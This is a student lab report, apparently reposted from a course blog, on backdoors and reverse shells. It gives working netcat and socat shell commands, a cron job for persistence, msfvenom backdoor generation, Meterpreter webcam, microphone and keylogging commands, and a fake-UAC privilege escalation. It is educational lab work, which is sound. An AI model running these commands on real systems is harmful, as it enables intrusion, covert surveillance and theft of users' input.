20232305 2025-2026-1 《网络与系统攻防技术》实验二实验报告

news/2025/10/22 14:13:42/文章来源:https://www.cnblogs.com/liguanc-210213/p/19154529

1.实验内容

(1)学习使用netcat监听端口,反弹链接到主机并获得shell;

(2)使用netcat在liunx主机上增加一个定时任务,并学习使用socat;

(3)使用MSF meterpreter生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell;

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权;

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

  • 回答基础问题:

(1)列举你能想到的一个后门进入到你系统中的可能方式?
通过某些盗版软件,在我执行可执行文件的时候植入后门,或者在硬件上,比如在加装硬盘的时候直接将后门文件放在硬盘中。

(2)列举你知道的后门如何启动起来(win及linux)的方式?
通过netcat反弹链接,或者在corn中植入定时任务,使其定时反弹链接到攻击机。

(3)Meterpreter有哪些给你印像深刻的功能?
首先就是使用非常方便,而且功能十分强大,只要几个单词就能调用截屏和摄像头,甚至还能伪造询问窗口来进行提权,如果真的被这个渗透后果简直不敢想象。

(4)如何发现自己的系统有没有被安装后门?
时不时看看任务管理器,看看有没有陌生的进程在工作,但最主要的还是使用360等杀毒软件来查杀检测后门。

2.实验过程

(一)使用netcat监听端口,反弹链接主机并获得shell,然后增加一个定时任务。

  • 使用netcat监听端口,反弹链接获得shell

先查看Windows主机的IP地址,作为攻击机
b5dcff1aa858ebbe8b1b0e93f42739b3

可见IP地址为192.168.110.1
接着使用netcat监听端口,在攻击机的终端上输入ncat.exe -l -p 5205指令来监听5205端口。其中-l参数指监听,-p是指定端口。
4fcc30c3c61ab35f50ef1eea01714506

然后进入kali,登入root用户,输入ncat 192.168.110.1 5205 -e /bin/sh,让被攻击机kali主动链接攻击机,其中-e的意思是如果如果建立连接,就执行后续文件,在这里是bin/sh,也就是shell
ded6ec3679ce43a4caffbe561e694641
可见已经获得了shell,攻击机能够查看我home/kali下的文件。

然后我又尝试了使用netcat监听和传输数据
18849a64d88fdf71adfb0762c0a2cd06
e191c71be91f11325ab83113cb2ffeb1
0b0d37f19a5712192122aa67c1df77ca
1f3ce57f0ced76b87d0ab95ec3874bb3

  • 增加一个定时任务

进入kali的root用户,输入crontab -e来设定时程表。选择/usr/bin/vim.basic,输入i进入插入模式,输入40 * * * */bin/netcat 192.168.110.1 5205 -e bin/sh(每小时第四十分钟启动netcat反弹链接并运行shell)
05b50228876b4e2fa9d2965639d728bc

然后只需要在Windows上持续监听5205端口,在四十分的时候就会获得kali的shell
dc9ad92cecca0407504b7a0db240e56c
28c3b136be49d592e7c10fab7779572a

(二)学习使用socat
Win+R输入compmgmt.msc打开“计算机管理”,在“任务计划程序”中“创建任务”,新建一个触发器,设置为工作占锁定时触发,并且在程序或脚本中选择自己的socat.exe文件的路径,在添加参数填写tcp-listen:5205 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5205,同时把cmd.exe的stderr重定向到stdout上
16a3a64bbef81b7a21a93918dfef54e9
6ea2754b8ff8ced3fdc146ec010adb5d
6f14cef6315d8974c79c9b6920bcc2d0

a8324e16f67e4a7c5e4118cdd94c8bb3
可见成功创建。

然后使用win+L锁定计算机,再次打开,发现任务正在执行,并且弹出警告窗口,这时在kali上输入socat - tcp:192.168.110.1:5205,就可以成功获得主机的shell
2d74602e77d7ea07f33d2716729ff419
50327dfa291141d46500e4b1efb6b2e1

(三)使用MSF meterpreter生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
首先关闭防火墙和实时保护功能。并在kali下使用ifconfig查看IP地址
00a32bc98d4d5eb09b4d3c71e018678d

输入 msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.110.130 LPORT=8888 -f exe > 20232305backdoor.exe(使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload,并将其保存到一个exe文件中。)
其中
LHOST=192.168.110.1是shell 连接的主机 IP 地址,在本实验中是虚拟机的IP地址;
LPORT=8888是攻击者的系统上监听的端口号;
-f exe指定了生成的 payload 的格式,这里是exe;
20232305backdoor.exe即生成的恶意可执行文件
3ed21b9a84b73e2fbeeb54104593ac0e

然后将恶意文件传到主机上,kali中输入nc 192.168.110.1 8888 < 2411backdoor.exe
这里我存放到了E盘中。

a92e28071c70a2fa54b3eed94eab596a
92fc52416325f46ef8766faa627d9ea8
可见成功传输。

配置监听模块:
use exploit/multi/handler(使用监听模块,设置payload)
set payload windows/meterpreter/reverse_tcp (使用和生成后门程序时相同的payload)
set LHOST 192.168.110.130(攻击机的IP地址,和生成后门程序时指定的IP相同)
set LPORT 8888(监听的端口)
6a40af1ab22c8b48ecc81f85c703e5d4
然后输入exploit运行监听模块,并在Windows上启动20232305backdoor.exe
65df8ac4cab6f2acca9d8aba5c8c4246
2cd509a948d736f7886839270aba2ad4
可见成功获得主机的shell

(四)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(1)获得主机音频、摄像头、键盘、截屏。
在exploit继续输入下面命令:
record_mic   (音频)
screenshot   (截屏)
webcam_snap (拍照)
keyscan_start (开始读取键盘记录)
keyscan_dump (读取键盘记录结束)

下面是得到的截屏,拍照的图片,以及音频和键盘记录,其中图片和音频保存在home/kali文件夹下,键盘记录直接显示在屏幕上
f21ad5c76b4d99db1dc22d5284f52bb9
a8d5b85f93a024fe355c552b6e36c439
74b65798da6209d5431aac1f033a0d4b
dcad7ee8303ff20faf0df525c52e7f7d

(2)尝试提权
正常情况下,在exploit输入getsystem会失败,所以我通过在windows下伪造一个UAC确认窗口,欺骗用户点击,从而获取权限。
在exploit输入下面代码
background
use exploit/windows/local/ask
set SESSION 1
set FILENAME QQUpdater.exe (显示的应用程序的名字)
run
然后输入getsystem
18fd2d419cf20f5ef2ba7be34f4a07f0
可见成功提权。

(五)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在kali下输入下面命令行
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.130 LPORT=8888 -x /home/kali/pwn1 -f elf > pwn2305
(使用了msfvenom工具生成一个Meterpreter 反向TCP shell的payload,并将其注入到指定的可执行文件中,然后将结果输出到一个名为pwn2305的文件中)

然后输入msfconsole进入msf,然后重新输入模块
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.222.129
set LPORT 8888
91f26d568a2e5658a8e3edbed3e5c478

这里我想用另一个Linux下的shell,所以payload使用linux下的
重现另开一个shell,运行pwn2305
5f50b3ad37a57502d70bf0ea47c75414
0957c0657a62d701fa9e0adf49465902

可见成功获得了shell

3.问题及解决方案

  • 问题1:在使用crontab定时链接到Windows的时候,发现能够成功链接,但是输入ls后什么都不出现,然后我反复检查了命令的正确性,然后询问AI,发现都没有问题。于是我想到有没有可能就是因为这个文件夹下没有任何文件,于是我在成功链接后输入pwd,发现能够反馈文件,说明就是因为我反弹连接到的文件夹下就是没有任何东西。

4.学习感悟、思考等

完成此次实验后,给我最大的感受就是平时在使用电子设备时不能乱下软件,尤其是免费的或者盗版的软件,这样很容易在不知不觉中就在电脑上植入后门,自己还完全无法察觉,只能依赖防火墙和病毒查杀软件。毕竟免费的才是最贵的。虽然如此,在使用msf的时候全程都是在关闭Windows的防火墙和实时保护下进行的,如果没有关闭,估计也无法成功获得摄像头等权限,这也给我一种魔高一尺,道高一丈的感觉。

参考资料

  • https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x22_MAL_后门进阶应用Meterprter.md
  • https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x21_MAL_后门原理与实践.md
  • https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x20_MSF_Metasploit框架基础.md

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943321.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

就在Visual Studio Code中配置好C/C++

就在Visual Studio Code中配置好C/C++这篇随笔主要是闲暇时间写的,写这篇随笔的原因有以下两点: 1.唯一的一个粉丝说我好久没更新了。 2.我的直系学弟他说他用Visual Studio Code一直搞不好C,终端也实现不了。 好的…

高效数据结构 - 循环队列

循环队列在游戏开发中通常叫做CircularBuffer、RingBuffer,常用来做数据缓存,生产者/消费者模型等。 在UE中有内置这样的数据结构,而Unity的.Net库中恰恰没有。为什么说这样的结构高效,以双下标循环队列为例。配个…

数据类型,二元运算符,自动类型提升规则,关系运算,取余模运算

数据类型,二元运算符,自动类型提升规则,关系运算,取余模运算数据类型,二元运算符,自动类型提升规则,关系运算,取余模运算 package com.kun.operator;public class Demo1 {public static void main(String[] ar…

股票技术面分析平台QuantMatrix深度解析 - 实践

股票技术面分析平台QuantMatrix深度解析 - 实践pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", &…

【C++实战(64)】C++ 邂逅SQLite3:数据库编程实战之旅 - 教程

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

迷宫问题

#include <iostream> #include <stack> #include <vector> #include <climits> using namespace std;// 迷宫大小 const int ROW = 5; const int COL = 5;// 迷宫(0:可走,1:墙,起点(0,0)…

WPF使用MediaCapture开发相机应用(四、相机录视频)

在WPF中使用MediaCapture录视频还是挺简单的,教程是WinUI3的,WPF也可以直接用。 主要代码就几句,相对简单: var videos = await StorageLibrary.GetLibraryAsync(KnownLibraryId.Videos); StorageFile file = awai…

Gitee本土化战略深度解析:中国开发者生态的合规与效率革命

Gitee本土化战略深度解析:中国开发者生态的合规与效率革命 在数字化转型加速的背景下,代码托管平台已成为企业研发基础设施的核心组件。作为国内领先的代码托管服务商,Gitee通过深度本土化战略构建了独特的竞争优势…

2025年10月上海装修公司口碑榜:十强对比评测

站在2025年10月的节点,准备装修的你大概率正被三件事困扰:预算怕超、工期怕拖、质量怕翻车。上海存量房超过780万套,二次翻新需求占年度装修总量62%,老房结构复杂、物业审批流程长、材料涨价频繁,让“选一家靠谱装…

2025年10月中国婚姻家事与财富管理律师评价榜:五强评测

当婚姻、继承、股权、跨境资产交织在一起,普通人最先感受到的是信息碎片化:谁懂信托架构?谁能追踪隐匿账户?怎样在离婚谈判里既保住公司控制权又不伤孩子?2025年,高净值家庭数量已突破220万户,年均增长8%,而家…

LGP8969 幻梦 Dream with Dynamic

LGP8969 幻梦 Dream with Dynamic \(\texttt{Luogu Link}\) 前言 唉,强校。 抛开别的不谈,这题意外地好懂……吗? 本学习笔记解析部分抄袭此文,代码抄袭此文。 题意简述 有一个长度为 \(n\) 的序列 \(A\),有初值。…

2025年10月中国婚姻家事与财富管理律师推荐榜:五强对比评测

站在2025年深秋,高净值家庭与新兴中产同时面临一个共性焦虑:婚姻结构变化带来的财产不确定性。北京、上海、深圳三地法院2024年婚姻家事案件标的额均值已升至320万元,隐匿财产线索发现率却不足三成。与此同时,金税…

2025年10月工业洗地机厂家推荐榜:十强对比评测与选型指南

一、引言 工业洗地机已成为制造、物流、物业、交通枢纽等场景提升清洁效率、降低人工成本的刚需装备。对于计划2025年第四季度完成设备更新或首次采购的决策者而言,如何在同质化宣传中快速锁定技术可靠、服务及时、全…

【多校支持、EI检索】第六届大数据与社会科学国际学术会议(ICBDSS 2025)

第六届大数据与社会科学国际学术会议 2025 6th International Conference on Big Data and Social Sciences(ICBDSS 2025) 经组委决定,本届会议延期至10月31日线上ZOOM形式召开 在这里看会议官网详情 大会时间:202…

2025年包装机厂家权威推荐榜单:全自动包装机/包装生产线/非标定制机器与生产线专业选购指南

2025年包装机厂家权威推荐榜单:全自动包装机/包装生产线/非标定制机器与生产线专业选购指南 一、行业背景与发展趋势 包装机械行业作为制造业的重要支撑领域,近年来呈现出智能化、柔性化、高效化的发展趋势。随着工业…

Timing Signoff 技术精要

1、为何 Timing Signoff 是 IC 设计的“守门人”? Timing Signoff 确保芯片设计在预定时钟频率下满足时序要求,并在多种工况下保持稳定性与可靠性。这是避免后期返工、提升产品良率与质量的重要步骤。图:Static Tim…

Bugku-Web题目-sqli-0x1- HackINI 2021 - 指南

Bugku-Web题目-sqli-0x1- HackINI 2021 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", &q…

02-GPIO-铁头山羊STM32标准库新版笔记

一、GPIO四种输出模式GPIO有8种工作模式输出:通过写0或者写1,控制引脚输出低电压或者高电压 输入:通过读取引脚是0还是1,判断引脚输入的是低电压还是高电压 通用:CPU 复用:其它片上外设 推挽:开漏:二、IO的最大…

IDC iPaaS市场报告解读:独立厂商与云巨头的“双轨竞速”

导语 在IDC最近发布的《中国企业集成平台(iPaaS)市场份额,2024:拥抱 Agentic AI 时代》报告中,华为作为云巨头连续两年排名第一,市场份额不断扩大。得帆信息作为专业iPaaS厂商,连续两年综合排名第三,引起行业广…

2025年10月仓储管理系统推荐:鸿链云仓领衔五大方案对比评测榜

一、引言 在供应链节奏日益加快的当下,仓储管理系统已成为制造、零售、医药、电商、冷链及第三方物流企业控制库存成本、保障履约时效、提升资金效率的核心数字底座。对于正面临“双11”大促备货、年度预算锁定及跨境…